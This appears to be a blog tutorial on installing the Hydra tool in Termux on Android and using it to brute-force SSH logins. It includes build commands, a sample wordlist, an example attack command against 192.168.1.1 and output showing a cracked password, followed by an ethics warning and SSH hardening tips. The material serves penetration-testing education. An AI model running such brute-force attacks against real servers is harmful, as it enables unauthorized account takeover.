Pin It!

The First Time I Tried SSH Password Cracking in Termux, I Was Stunned.

I had heard whispers about Termux’s power, but nothing could have prepared me for the sheer intensity of Hydra. That first attempt—cracking an SSH password on a remote server—felt like stepping into a new world. The terminal screen flashed with progress, each line pulling me closer to success. With Hydra, brute-forcing SSH passwords wasn’t just a task—it was a relentless pursuit that never stopped, a constant back-and-forth until victory was mine.

If you’ve ever wondered how professionals crack SSH passwords, or you’re eager to sharpen your penetration testing skills, then you’ve come to the right place. Unlock the full potential of Hydra in Termux. Dive into this guide and harness its power to crack even the toughest SSH passwords.

Get my FREE Hydra Cheat Sheet Now!

---

Table of Contents

Pin It!

Pin It!

• Prerequisites
• Installing Hydra on Termux
  • Update Termux packages
  • Install Hydra
  • Install Hydra from Source (Manual Method)
  • Verify Hydra installation
  • Fixing "Read-only file system" Error in Termux When Installing Hydra
  • Solution: Install Hydra to Termux’s User Directory
    • 1. Create a Local Bin Directory
    • 2. Modify the Makefile
    • 3. Run Make Install Again
    • 4. Verify Installation
  • Alternative: Manually Move the Binary
• SSH Password Cracking with Hydra
• Creating a Password List for Cracking
  • Contents of passwords.txt
• Running Hydra to Crack SSH Passwords
• Ethical Use and Security Measures
• Ready to Master SSH Cracking in Termux?

Pin It!

---

Prerequisites

Before we dive into the steps of SSH password cracking using Hydra, let’s go over the requirements. These are the basic tools and setups you’ll need to complete this tutorial:

1. Termux installed: Termux is a Linux terminal emulator for Android, allowing you to run and install command-line tools. If you haven’t installed Termux yet, it’s available for download on the Google Play Store or its GitHub page.
2. Hydra installed: Hydra is a password-cracking tool that doesn’t come pre-installed in Termux. We will show you how to install it step by step.
3. Target SSH server: You will need a server running SSH for testing purposes. Ensure that you have permission to test the server; unauthorized access attempts are illegal and unethical.

Additionally, it’s recommended that you use Termux in a Linux-compatible environment and update your package list by running:

pkg update && pkg upgrade

· · ─ ·𖥸· ─ · ·

Installing Hydra on Termux

Hydra is not pre-installed on Termux, so the first step is to install it. Let’s go over how to install Hydra and verify that it is working.

Update Termux packages

Before installing any new software, always ensure your system is up to date by running:

pkg update

Install Hydra

Use the following command to install Hydra:

pkg install hydra

This command will download and install Hydra, along with any necessary dependencies.

Update 04/03/2025: This no longer works. Use this instead:

Install Hydra from Source (Manual Method)

If all else fails, compile Hydra manually:

pkg install git build-essential
git clone https://github.com/vanhauser-thc/thc-hydra.git
cd thc-hydra
./configure
make
make install

Then, check if Hydra is installed:

hydra -h

Verify Hydra installation

Once the installation is complete, verify that Hydra was installed correctly by running:

Once the installation is complete, verify that Hydra was installed correctly by running:

hydra -h 

You should see Hydra’s help page with a list of commands and options, confirming that it is ready to use.

Hydra is now installed and operational, ready for SSH password cracking and other testing protocols.

Fixing “Read-only file system” Error in Termux When Installing Hydra

The error occurs because Termux does not allow writing to /usr/local/bin due to Android’s file system restrictions. Since Termux runs in user space, the traditional /usr directory is read-only.

~/thc-hydra $ make install

Now type make install
strip hydra pw-inspector
echo OK > /dev/null && test -x xhydra && strip xhydra || echo OK > /dev/null
mkdir -p /usr/local/bin
mkdir: cannot create directory ‘/usr’: Read-only file system
make: [Makefile:88: install] Error 1 (ignored)
cp -f hydra-wizard.sh hydra pw-inspector /usr/local/bin && cd /usr/local/bin && chmod 755 hydra-wizard.sh hydra pw-inspector
cp: target '/usr/local/bin': No such file or directory
make: *** [Makefile:89: install] Error 1

Solution: Install Hydra to Termux’s User Directory

Instead of /usr/local/bin, install Hydra in Termux’s home directory. Follow these steps:

1. Create a Local Bin Directory

mkdir -p $PREFIX/bin

2. Modify the Makefile

Run this command inside the thc-hydra directory:

sed -i 's|/usr/local/bin|$PREFIX/bin|g' Makefile

This changes the install path from /usr/local/bin to Termux’s user space ($PREFIX/bin).

3. Run Make Install Again

make install

4. Verify Installation

hydra -h

Alternative: Manually Move the Binary

If the above method fails, manually move the compiled hydra binary to Termux’s bin directory:

cp hydra $PREFIX/bin/
chmod +x $PREFIX/bin/hydra

Then test it:

hydra -h

Pin It!

SSH Password Cracking with Hydra

Now that Hydra is installed, let’s dive into using it to perform an SSH password cracking attack. The goal here is to attempt to find the correct password for a specific user on an SSH server by trying multiple passwords from a wordlist.

The basic syntax for using Hydra to crack SSH passwords is:

hydra -l <username> -P <password_list> <target> ssh

• -l <username>: This specifies the username for the account you are trying to access (for example, admin).
• -P <password_list>: This option specifies the path to the file containing a list of potential passwords (often called a “wordlist”).
• <target>: This is the IP address or domain name of the SSH server you are attacking.
• ssh: This tells Hydra that you are attacking an SSH service.

Example Command:

Suppose you want to test an SSH server running at 192.168.1.1 for the user admin, using a wordlist file named passwords.txt. The command would be:

hydra -l admin -P passwords.txt 192.168.1.1 ssh

Hydra will then begin trying each password in the passwords.txt file for the admin account on the target SSH server.

· · ─ ·𖥸· ─ · ·

Creating a Password List for Cracking

In most password-cracking attacks, you’ll need a wordlist that contains potential passwords. Hydra will try each password in the wordlist until it finds the correct one, or until all options have been exhausted.

If you don’t have a wordlist, you can create one. Here’s how to create a simple wordlist file in Termux:

echo -e "password123\nadmin\nletmein\n123456\npassword\nqwerty" > passwords.txt

This command creates a file named passwords.txt that contains six common passwords, one on each line. This basic list is useful for testing, but in real-world scenarios, penetration testers often use larger wordlists that include thousands or millions of passwords.

Contents of passwords.txt

password123
admin
letmein
123456
password
qwerty

There are many publicly available wordlists you can use, such as those found in the SecLists project on GitHub. However, for testing purposes, this simple list will suffice.

· · ─ ·𖥸· ─ · ·

Running Hydra to Crack SSH Passwords

Once you’ve set up your password list, you can run Hydra to attempt the SSH password cracking. Here’s an example using the command structure mentioned earlier:

hydra -l admin -P passwords.txt 192.168.1.1 ssh

Hydra will then attempt to log in to the SSH server at 192.168.1.1 using the username admin and each password from the wordlist in sequence.

Sample Output

Hydra v9.1 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes.

[DATA] attacking ssh://192.168.1.1:22/
[DATA] 4 tasks, 1 server, 6 login tries (l:1/p:6), ~1 try per task
[22][ssh] host: 192.168.1.1   login: admin   password: password123
[STATUS] attack finished for 192.168.1.1 (valid pair found)

Explanation
Hydra successfully found the correct password (password123) for the admin user. This output shows the IP address of the SSH server, the username (admin), and the password that worked. The attack ends when Hydra finds a valid login combination or runs out of password options to try.

· · ─ ·𖥸· ─ · ·

Ethical Use and Security Measures

Password cracking is a powerful technique, but it must always be used responsibly. It’s illegal to perform brute-force attacks on systems without explicit permission from the system owner. Hydra is designed for ethical hacking and penetration testing, and should only be used in environments where you have the authorization to test security.

To protect your own systems from these types of attacks, consider the following security measures:

• Disable password-based SSH logins and use key-based authentication instead.
• Enforce strong password policies to make it more difficult for attackers to guess or crack passwords.
• Limit the number of failed login attempts and use tools like Fail2Ban to block IP addresses that attempt brute-force attacks.

For more information on securing your SSH server, check out our article on SSH security best practices, which covers key-based authentication, firewalls, and other important security measures.

· · ─ ·𖥸· ─ · ·

Ready to Master SSH Cracking in Termux?

Now that you’ve seen how powerful Hydra can be for SSH password cracking in Termux, it’s time to take action. Whether you’re just starting or you’re refining your skills, the power of Hydra is at your fingertips. Don’t let your curiosity stop here.

Dive deeper into penetration testing, master your tools, and stay one step ahead in the cybersecurity game. Start cracking today—your skills are your greatest asset.